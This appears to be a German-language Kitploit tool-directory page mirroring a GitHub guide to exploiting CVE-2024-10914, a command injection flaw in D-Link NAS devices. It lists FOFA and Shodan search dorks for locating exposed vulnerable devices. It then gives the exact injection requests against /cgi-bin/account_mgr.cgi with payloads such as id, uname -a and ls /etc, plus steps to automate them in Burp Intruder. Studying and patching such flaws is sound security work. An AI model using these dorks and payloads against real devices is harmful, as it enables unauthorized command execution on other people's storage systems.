Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10914 — CVE-2024-10914_Manuelles Testen mit burpsuite | Kitploit
Tools/GitHubGitHub/egi08/cve-2024-10914
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsCommand and Control
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_Manuelles Testen mit burpsuite

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10914 Befehlseinschleusungs-Schwachstellentest für D-Link NAS_Manueller Test mit Burp Suite


Dork zum Auffinden anfälliger Geräte

Verwenden Sie den folgenden Such-Dork, um potenziell anfällige D-Link NAS-Geräte zu finden:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

Diese Suchzeichenfolge hilft dabei, Geräte zu identifizieren, die die anfällige D-Link DNS ShareCenter-App mit der spezifischen Version des Lighttpd-Servers ausführen, die von der Schwachstelle betroffen ist.


Dieses Leitfaden enthält Schritt-für-Schritt-Anleitungen zum manuellen Testen einer Befehlseinschleusungs-Schwachstelle (CVE-2024-10914) im name-Parameter von D-Link NAS mit Burp Suite. Ziel-URL: http://Target.

Voraussetzungen

  • Burp Suite
  • Ein Webbrowser, der so konfiguriert ist, dass Burp Suite als Proxy verwendet wird (normalerweise auf 127.0.0.1:8080 eingestellt)

Schritt 1: Burp Suite einrichten

  1. Burp Suite starten: Starten Sie Burp Suite auf Ihrem Rechner.
  2. Proxy konfigurieren: Stellen Sie sicher, dass Ihr Browser so konfiguriert ist, dass Burp Suite als Proxy verwendet wird, indem Sie die Proxy-Einstellungen des Browsers auf 127.0.0.1 und Port 8080 setzen.

Schritt 2: Die Anfrage abfangen

  1. Zum Ziel navigieren: Gehen Sie in Ihrem Browser zu http://Target.
  2. Intercept aktivieren: Aktivieren Sie in Burp Suite die Intercept-Funktion, um die ausgehende Anfrage abzufangen.

Schritt 3: Die Anfrage ändern

  1. Den anfälligen Parameter finden: Suchen Sie in der abgefangenen Anfrage den name-Parameter in der URL. Er sollte wie folgt aussehen:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. Einen Testbefehl injizieren: Ändern Sie den name-Parameter, um einen Testbefehl wie echo "test" einzufügen:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. Die geänderte Anfrage senden: Leiten Sie die geänderte Anfrage an den Server weiter.


Schritt 4: Die Antwort analysieren

  1. Antwort prüfen: Suchen Sie in der Antwort nach der Ausgabe des injizierten Befehls. Wenn der Server beispielsweise echo "test" ausgeführt hat, sollten Sie folgendes sehen:

    root@kitploit:~
    test
    

Schritt 5: Die Schwachstelle ausnutzen

  1. Einen schädlichen Befehl injizieren: Wenn der Test erfolgreich ist, versuchen Sie es mit anspruchsvolleren Befehlen, wie zum Beispiel:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. Die Exploit-Anfrage senden: Leiten Sie diese Anfrage an den Server weiter.

  3. Antwort analysieren: Prüfen Sie, ob die Ausgabe des Befehls (z.B. Benutzer-ID-Informationen) in der Antwort vorhanden ist.


Schritt 6: Automatisierung mit Burp Suite Erweiterungen (Optional)

  1. Intruder verwenden: Automatisieren Sie Tests mit dem Intruder-Tool von Burp Suite.

    • Klicken Sie mit der rechten Maustaste auf die Anfrage und wählen Sie An Intruder senden.
    • Setzen Sie den name-Parameter als Payload-Position.
    • Verwenden Sie eine Liste von Befehlen als Payloads für Tests.
  2. Beispiel-Payloads:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Intruder starten: Führen Sie den Intruder-Angriff aus, um automatisch mehrere Payloads zu testen.


Tool herunterladen